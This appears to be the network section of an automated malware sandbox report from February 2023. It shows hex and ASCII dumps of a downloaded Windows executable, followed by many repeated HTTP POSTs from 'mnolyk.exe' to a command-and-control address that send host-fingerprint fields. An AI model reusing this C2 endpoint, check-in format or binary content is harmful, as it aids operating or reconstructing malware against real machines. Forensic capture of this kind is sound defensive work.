00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 14 00 00 00 60 01 00 00 0c 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 80 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 10 00 00 00 90 01 00 00 12 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$,CyCyCy~Iy~y~Qy~Ly~Ry~by~FyCyy~@y~ByBy~ByRichCyPEL8c!>@J<K<T ?p?@,.textV `.rdataab@@.dataD`D@.rsrcP@@.relocTR@B
                                                                    Feb 8, 2023 21:31:09.779735088 CET109INData Raw: 00 00 00 00 6a 20 68 a8 3c 01 10 b9 70 68 01 10 e8 3f 23 00 00 68 00 ea 00 10 e8 8c 2a 00 00 59 c3 cc cc cc 6a 38 68 cc 3c 01 10 b9 88 68 01 10 e8 1f 23 00 00 68 60 ea 00 10 e8 6c 2a 00 00 59 c3 cc cc cc 6a 38 68 cc 3c 01 10 b9 a0 68 01 10 e8 ff
                                                                    Data Ascii: j h<ph?#h*Yj8h<h#h`l*Yj8h<h"hL*Yj8h<h"h ,*Yj8h=h"h*Yj0hD=h"h)Yj0hx=i"h@)Yhh=i
                                                                    Feb 8, 2023 21:31:09.779755116 CET110INData Raw: 7d f0 10 8d 45 dc 0f 43 45 dc 0f be 04 18 8b 04 81 83 f8 ff 74 27 c1 e6 06 03 f0 83 c7 06 78 18 8b cf 8b c6 d3 f8 8b 4d f4 50 e8 1f 1b 00 00 8b 55 ec 83 ef 08 8b 4d f8 43 3b da 72 c2 8b 45 f8 85 c0 74 0e 68 00 04 00 00 50 e8 f0 21 00 00 83 c4 08
                                                                    Data Ascii: }ECEt'xMPUMC;rEthP!Ur(MBrI#+wVRQ!UEEEr(MBrI#+wRQ~!E_^[]GU4E0SVW3E
                                                                    Feb 8, 2023 21:31:09.779795885 CET112INData Raw: 23 52 51 e8 31 1d 00 00 83 c4 08 33 f6 e9 74 ff ff ff 52 51 e8 20 1d 00 00 83 c4 08 5f 8b c6 5e 8b e5 5d c3 e8 3f 43 00 00 e8 4a 1a 00 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 18 8b 55 1c 8b 4d 08 56 85 c0 0f 84 82 00 00 00 53 40 57 50
                                                                    Data Ascii: #RQ13tRQ _^]?CJUQEUMVS@WP] M}CM+IDuNFu+FVjVSWP5WjWj UM_[^r%BrI#+wRQ
                                                                    Feb 8, 2023 21:31:09.779834986 CET113INData Raw: 10 72 2d 8b 4c 24 40 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 f8 10 00 00 52 51 e8 06 18 00 00 83 c4 08 8b 0d e4 68 01 10 83 f9 10 72 2e a1 d0 68 01 10 41 81 f9 00 10 00 00 72 16 8b 50 fc 83 c1 23 2b c2 83
                                                                    Data Ascii: r-L$@BrI#+RQhr.hArP#+QPD$`hhL$Dh~D$tfhQT$DL$dT$Xr-L$@BrI#+PRQ^hr.hArP
                                                                    Feb 8, 2023 21:31:09.779865026 CET114INData Raw: 00 00 8a 41 02 3a 42 02 75 0f 83 7c 24 1c ff 74 7b 8a 41 03 3a 42 03 74 73 83 ff 25 73 6e 83 ce 02 c7 44 24 50 00 00 00 00 b9 01 00 00 00 89 74 24 18 3b f9 c7 44 24 54 0f 00 00 00 8d 44 24 20 c6 44 24 40 00 0f 42 cf 83 7c 24 34 10 51 0f 43 44 24
                                                                    Data Ascii: A:Bu|$t{A:Bts%snD$Pt$;D$TD$ D$@B|$4QCD$$L$DPT$TD$@L$@C|$Pu81u|$0D$|$0L$@T$TD$D$t9D$r-BrI#+LRQZD$ T$tD$r-L$`B
                                                                    Feb 8, 2023 21:31:09.779894114 CET116INData Raw: 6c 8b c7 83 e8 04 89 44 24 1c 72 19 8b 01 3b 02 75 1c 8b 44 24 1c 83 c1 04 83 c2 04 83 e8 04 89 44 24 1c 73 e7 83 f8 fc 0f 84 bd 00 00 00 8a 01 3a 02 75 39 83 7c 24 1c fd 0f 84 ac 00 00 00 8a 41 01 3a 42 01 75 26 83 7c 24 1c fe 0f 84 99 00 00 00
                                                                    Data Ascii: lD$r;uD$D$s:u9|$A:Bu&|$A:Bu|$A:Bt~GwvD$Pt$;D$TD$ D$@B|$4QCD$$L$DPT$TD$@L$@C|$Pu0xf90u|$0D$|$0L$@T$T
                                                                    Feb 8, 2023 21:31:09.779922962 CET117INData Raw: fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 f1 01 00 00 52 51 e8 ff 08 00 00 83 c4 08 80 7c 24 17 00 74 17 83 ec 18 8b cc 68 00 69 01 10 e8 35 04 00 00 e8 e0 eb ff ff 83 c4 18 8b 74 24 18 83 ec 18 8b cc 81 ce 00 10 00 00
                                                                    Data Ascii: rI#+RQ|$thi5t$t$0hiL$xWxr|$4L$ CL$ ;xudD$r;uD$D$s:u1|$A:Bu|$tzA:Bu|$tkA:Btc_u^
                                                                    Feb 8, 2023 21:31:09.779947996 CET119INData Raw: 0e 50 57 51 e8 41 1d 00 00 8b 45 08 83 c4 0c 89 46 10 8b c6 89 5e 14 5f 5e 5b 5d c2 04 00 e8 97 de ff ff e8 22 2a 00 00 cc cc 55 8b ec 51 53 56 8b f1 57 8b 7d 0c 8b 4e 14 89 4d fc 3b f9 77 28 8b de 83 f9 10 72 02 8b 1e 57 ff 75 08 89 7e 10 53 e8
                                                                    Data Ascii: PWQAEF^_^[]"*UQSVW}NM;w(rWu~S";_^[]v+;v;BC=r%H#;QtwA#HtPm3WuEP~^
                                                                    Feb 8, 2023 21:31:09.779970884 CET120INData Raw: 00 50 e8 bc 2e 00 00 59 85 c0 74 03 32 c0 c3 e8 a2 30 00 00 b0 01 c3 6a 00 e8 d0 00 00 00 84 c0 59 0f 95 c0 c3 e8 cc 0c 00 00 84 c0 75 03 32 c0 c3 e8 0c 35 00 00 84 c0 75 07 e8 c2 0c 00 00 eb ed b0 01 c3 e8 04 35 00 00 e8 b3 0c 00 00 b0 01 c3 55
                                                                    Data Ascii: P.Yt20jYu25u5Uu}uuMPu,Uuu'YY]cth,j3Y!+*j4YnU}u(jOu2]T4uj%Y]U=
                                                                    Feb 8, 2023 21:31:09.841473103 CET122INData Raw: 00 00 00 53 57 ff 75 08 e8 b1 f8 ff ff 8b f0 89 75 e4 83 ff 01 75 22 85 f6 75 1e 53 50 ff 75 08 e8 99 f8 ff ff 53 56 ff 75 08 e8 64 fd ff ff 53 56 ff 75 08 e8 6a 00 00 00 85 ff 74 05 83 ff 03 75 48 53 57 ff 75 08 e8 47 fd ff ff 8b f0 89 75 e4 85
                                                                    Data Ascii: SWuuu"uSPuSVudSVujtuHSWuGut5SWuD$MQ0h:uuue3uEMdY_^[UV5u3@uuu,^]U}uuuu]


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    10192.168.2.34971162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:11.882853985 CET210OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:11.944474936 CET211INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    100192.168.2.34980262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:44.378401995 CET301OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:44.442873955 CET301INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    101192.168.2.34980362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:44.620667934 CET302OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:44.683964014 CET302INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    102192.168.2.34980462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:44.855990887 CET303OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:44.919894934 CET303INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    103192.168.2.34980562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:45.092452049 CET304OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:45.155440092 CET304INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    104192.168.2.34980662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:45.331321001 CET305OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:45.396585941 CET305INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    105192.168.2.34980762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:45.583488941 CET306OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:45.648488998 CET306INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    106192.168.2.34980862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:45.869321108 CET307OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:45.932929039 CET307INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    107192.168.2.34980962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:46.106372118 CET308OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:46.171797991 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    108192.168.2.34981062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:46.341948986 CET309OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:46.407923937 CET309INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    109192.168.2.34981162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:46.576529026 CET310OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:46.639722109 CET310INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    11192.168.2.34971262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:12.121654034 CET211OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:12.188114882 CET212INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    110192.168.2.34981262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:46.808504105 CET311OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:46.870836020 CET311INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    111192.168.2.34981362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:47.049280882 CET312OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:47.115288973 CET312INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    112192.168.2.34981462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:47.295499086 CET313OUTPOST /Gol478Ns/index.php HTTP/1.1
